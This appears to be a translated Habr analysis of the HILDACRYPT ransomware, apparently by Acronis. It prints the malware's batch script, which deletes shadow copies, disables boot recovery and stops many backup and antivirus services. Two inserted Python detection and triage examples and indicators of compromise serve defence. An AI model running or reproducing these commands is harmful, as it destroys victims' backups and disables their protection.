HILDACRYPT: New ransomware attacks backup systems and antivirus solutions

Hello, Habr! Once again we are talking about the latest malware samples from the Ransomware category. HILDACRYPT is a new ransomware, a member of the Hilda family discovered in August 2019, named after the Netflix cartoon that was used to distribute the software. Today we are getting acquainted with the technical features of this updated ransomware.

In the first version of the Hilda ransomware, a link to the YouTube trailer of the animated series was in the ransom note. HILDACRYPT poses as a legitimate XAMPP installer, an easy-to-install Apache distribution that includes MariaDB, PHP and Perl. At the same time, the cryptolocker has a different file name: xamp. In addition, the ransomware file has no electronic signature.

Static analysis

The ransomware is contained in a PE32 .NET file written for MS Windows. Its size is 135 168 bytes. Both the main program code and the protector program code are written in C#. Judging by the compile date and timestamp, the binary was created on September 14.

According to Detect It Easy, the ransomware is protected with Confuser and ConfuserEx, but these obfuscators are the same as before: ConfuserEx is simply the successor of Confuser, so their code signatures are similar.

HILDACRYPT is indeed packed with ConfuserEx.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Attack vector

Most likely, the ransomware was discovered on one of the web hosting sites, posing as a legitimate XAMPP program.

The entire infection chain can be seen in the app.any.run sandbox.

Obfuscation

The ransomware's strings are stored in encrypted form. On startup, HILDACRYPT decrypts them using Base64 and AES-256-CBC.

Execution

First of all, the ransomware creates a folder in %AppData%\Roaming whose name is a randomly generated GUID (Globally Unique Identifier). Having placed a bat file in this location, the ransomware launches it with cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

It then starts executing the batch script to disable system functions and services.

The script contains a long list of commands that destroy shadow copies and disable the SQL server, backup solutions and antiviruses.

For example, it unsuccessfully tries to stop the Acronis Backup services. In addition, it attacks backup systems and antivirus solutions from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
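The tactics in this script (shadow-copy tampering, disabling boot recovery, and stopping backup and antivirus services) are easy to spot in process-creation telemetry. The following Python is an added example, not code from the article or from Acronis: it runs simple detection logic over constructed command-line log lines in the style of Sysmon event ID 1 (the "CommandLine:" prefix and the lines themselves are constructed here) and raises an alert for a host when more than one of these tactics co-occurs. The service-name fragments are taken from the service names in the script above.

```python
import re

# Patterns matching the commands used in the batch script above.
SHADOW_RE = re.compile(
    r"\bvssadmin(?:\.exe)?\s+(?:delete\s+shadows|resize\s+shadowstorage)\b", re.I)
BCDEDIT_RE = re.compile(
    r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+"
    r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)
# The service name is either a quoted string (straight or curly quotes) or one token.
NET_STOP_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+stop\s+(\"[^\"]+\"|“[^”]+”|\S+)", re.I)

# Fragments of the backup/antivirus service names targeted by the script.
PROTECTED_SERVICE_HINTS = (
    "veeam", "sophos", "swi_",                               # Veeam, Sophos
    "kavfs", "klnagent", "avp",                              # Kaspersky
    "mcafee", "mcshield", "mctaskmanager", "mfe",            # McAfee
    "acronis", "acrsch",                                     # Acronis
    "backupexec", "bedbg", "sepmasterservice", "smcservice", # Backup Exec, Symantec
    "wbengine", "sdrsvc", "vss",                             # Windows backup / VSS
)


def analyze_command_line(cmd):
    """Return the ransomware-preparation tactics seen in one command line."""
    findings = []
    if SHADOW_RE.search(cmd):
        findings.append("shadow_copy_tampering")
    if BCDEDIT_RE.search(cmd):
        findings.append("boot_recovery_disabled")
    m = NET_STOP_RE.search(cmd)
    if m:
        service = m.group(1).strip('"“”').lower()
        if any(hint in service for hint in PROTECTED_SERVICE_HINTS):
            findings.append("protected_service_stop:" + service)
    return findings


def triage_host(log_lines, min_tactics=2):
    """Aggregate findings over one host's command lines; alert when tactics co-occur."""
    tactics = set()
    stopped = []
    for line in log_lines:
        for finding in analyze_command_line(line):
            if finding.startswith("protected_service_stop:"):
                stopped.append(finding.split(":", 1)[1])
                tactics.add("protected_service_stop")
            else:
                tactics.add(finding)
    return {
        "tactics": sorted(tactics),
        "stopped_services": stopped,
        "alert": len(tactics) >= min_tactics,
    }


# Constructed sample telemetry; the benign lines at the end must not be flagged.
SAMPLE_LOG = [
    "CommandLine: cmd.exe /c JKfgkgj3hjgfhjka.bat & exit",
    "CommandLine: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "CommandLine: bcdedit /set {default} recoveryenabled No",
    "CommandLine: vssadmin Delete Shadows /all /quiet",
    'CommandLine: net stop "Sophos AutoUpdate Service" /y',
    "CommandLine: net stop VeeamBackupSvc /y",
    "CommandLine: net stop Spooler /y",
    "CommandLine: notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    print(triage_host(SAMPLE_LOG))
```

A single `vssadmin` or `net stop` is noisy on its own (administrators run both), which is why the alert requires at least two distinct tactics from the same host; the individual findings are still returned so they can be correlated with other signals.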

Once the services and processes listed above are disabled, the cryptolocker collects information about all running processes with the tasklist command, to make sure that all the required services are down.

tasklist /v /fo csv

This command displays a detailed list of running processes, with fields separated by the "," character.

"csrss.exe","448","services","0","1 896 КБ","unknown","Н/Д","0:00:03","Н/Д"

After this check, the ransomware starts the encryption process.

Encryption

File search

HILDACRYPT traverses all discovered contents of the hard drives, except for the Recycle.Bin and Reference Assemblies\Microsoft folders. The latter contains the dll, pdb and similar files for .Net applications that could affect the operation of the ransomware. To find the files to be encrypted, the following list of extensions is used:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

The ransomware uses the AES-256-CBC algorithm to encrypt user files. The key size is 256 bits and the initialization vector (IV) size is 16 bytes.

In the following screenshot, the values of byte_2 and byte_1 are generated randomly using GetBytes().

Key

IV

The encrypted file receives the HCY! extension. Here is an example of an encrypted file; the key and IV mentioned above were created for this file.

Key storage

The cryptolocker stores the generated AES key in the encrypted file. The first part of the encrypted file contains a header with data such as HILDACRYPT, KEY, IV and FileLen in XML form, and it looks like this:

The AES key and IV are encrypted with RSA-2048, and the encoding is done with Base64. The RSA public key is stored in the body of the cryptolocker in one of the encrypted strings, in XML form.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

The RSA public key is used to encrypt the AES file key. The RSA public key is Base64-encoded and consists of a modulus and the public exponent 65537. Decryption requires the RSA private key, which only the attacker holds.

After RSA encryption, the AES key is encoded with Base64 and stored in the encrypted file.
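A small triage script for the key material described in this section, added here as an example (not code from the article or from Acronis). It decodes the RSA public key quoted above and confirms that it is a 2048-bit modulus with public exponent 65537, and it parses a constructed file header of the kind described (HILDACRYPT, KEY, IV, FileLen) to check whether the wrapped key and IV are RSA-2048-sized blobs, which is what makes the files unrecoverable without the attacker's private key. The `<RSAKeyValue>`/`<Modulus>`/`<Exponent>` element names are the .NET RSA XML layout and, like the header element layout and the sample header, are assumptions; the page shows only the Base64 content.

```python
import base64
import xml.etree.ElementTree as ET

# Base64 modulus and exponent exactly as quoted in the article (split for readability).
MODULUS_B64 = (
    "28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+"
    "eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuT"
    "v+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiV"
    "Fud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7"
    "yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgL"
    "XP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ=="
)
EXPONENT_B64 = "AQAB"

# Assumed layout: .NET RSAKeyValue XML (the article shows the content with tags stripped).
PUBLIC_KEY_XML = (
    f"<RSAKeyValue><Modulus>{MODULUS_B64}</Modulus>"
    f"<Exponent>{EXPONENT_B64}</Exponent></RSAKeyValue>"
)


def parse_rsa_key_xml(xml_text):
    """Decode an RSAKeyValue XML document into the integers (n, e)."""
    root = ET.fromstring(xml_text)
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    return n, e


def describe_public_key(xml_text):
    """Summarise the key: modulus size, exponent, and a basic sanity check (odd modulus)."""
    n, e = parse_rsa_key_xml(xml_text)
    return {"modulus_bits": n.bit_length(), "exponent": e, "modulus_is_odd": n % 2 == 1}


def build_sample_header(wrapped_key, wrapped_iv, file_len):
    """Construct a header in the assumed layout; the blobs stand in for RSA ciphertext."""
    root = ET.Element("HILDACRYPT")
    ET.SubElement(root, "KEY").text = base64.b64encode(wrapped_key).decode("ascii")
    ET.SubElement(root, "IV").text = base64.b64encode(wrapped_iv).decode("ascii")
    ET.SubElement(root, "FileLen").text = str(file_len)
    return ET.tostring(root, encoding="unicode")


def triage_header(header_xml, rsa_bits=2048):
    """Report blob sizes; an RSA-wrapped value is exactly rsa_bits/8 bytes long."""
    root = ET.fromstring(header_xml)
    key_blob = base64.b64decode(root.findtext("KEY"))
    iv_blob = base64.b64decode(root.findtext("IV"))
    expected = rsa_bits // 8
    return {
        "file_len": int(root.findtext("FileLen")),
        "key_blob_len": len(key_blob),
        "iv_blob_len": len(iv_blob),
        "rsa_wrapped": len(key_blob) == expected and len(iv_blob) == expected,
    }


# Constructed sample header: 256-byte placeholder blobs, the size of an RSA-2048 ciphertext.
SAMPLE_HEADER = build_sample_header(bytes(range(256)), bytes(256), file_len=4096)

if __name__ == "__main__":
    print(describe_public_key(PUBLIC_KEY_XML))
    print(triage_header(SAMPLE_HEADER))
```

The header check is what an analyst wants before promising a victim anything: a 256-byte KEY blob matches RSA-2048 wrapping, so the per-file AES key is only recoverable with the private key, whereas a 32-byte KEY blob would indicate the raw key was stored unwrapped.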

Ransom note

Once encryption is complete, HILDACRYPT writes an html file to the folder in which it encrypted files. The ransom note contains two email addresses through which the victim can contact the attacker.

The ransom note also contains the line "No loli is safe;)", a reference to anime and manga characters with the appearance of young girls, which are banned in Japan.

Conclusion

HILDACRYPT, a new ransomware family, has produced a new variant. The encryption model prevents the victim from decrypting the files encrypted by the ransomware. The cryptolocker uses active methods to disable security services related to backups and antivirus solutions. The author of HILDACRYPT is a fan of the animated series Hilda shown on Netflix; a link to its trailer was in the ransom note of the previous version of the program.

Traditionally, Acronis Backup and Acronis True Image can protect your computer from the HILDACRYPT ransomware, and providers can protect their customers with Acronis Backup Cloud. Protection is ensured by the fact that these solutions include cybersecurity not only as backup, but also as our integrated protection system, Acronis Active Protection: powered by a machine learning model and based on behavioral heuristics, it is a technology capable of countering zero-day ransomware threats like no other.

Indicators of compromise

File extension HCY!
HILDACRYPTReadMe.html
xamp.exe with a single letter "p" and without a digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Source: www.habr.com
